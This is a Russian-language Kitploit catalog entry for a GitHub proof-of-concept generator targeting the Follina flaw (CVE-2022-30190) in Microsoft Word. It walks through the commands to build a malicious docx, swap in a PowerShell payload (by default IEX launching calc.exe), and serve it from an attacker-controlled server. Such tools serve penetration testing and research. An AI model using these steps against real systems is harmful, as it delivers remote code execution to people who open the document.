Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-30190 — MS-MSDT Follina CVE-2022-30190 PoC document generator | Kitploit
Инструменты/GitHubGitHub/sudoaza/cve-2022-30190
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubsudoaza/cve-2022-30190

CVE-2022-30190

MS-MSDT Follina CVE-2022-30190 PoC document generator

Репозиторий
724 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

MS-MSDT Follina CVE-2022-30190 PoC

Генератор вредоносных docx-файлов для эксплуатации (Удаленное выполнение кода в Microsoft Office Word)

Создание этого скрипта основано на PoC для CVE-2021-40444 от LockedByte и статье от Tothi

Использование

Сначала измените backup.html и замените полезную нагрузку PowerShell. Сейчас просто запускается calc.exe с помощью IEX('calc.exe').

python3 exploit.py generate http://<IP СЕРВЕРА>

Генерация документа

После генерации вредоносного docx (будет в out/) можно настроить сервер:

sudo python3 exploit.py host 80

Сервер

Наконец, попробуйте открыть docx в виртуальной машине Windows:

Открытие калькулятора

Скачать инструмент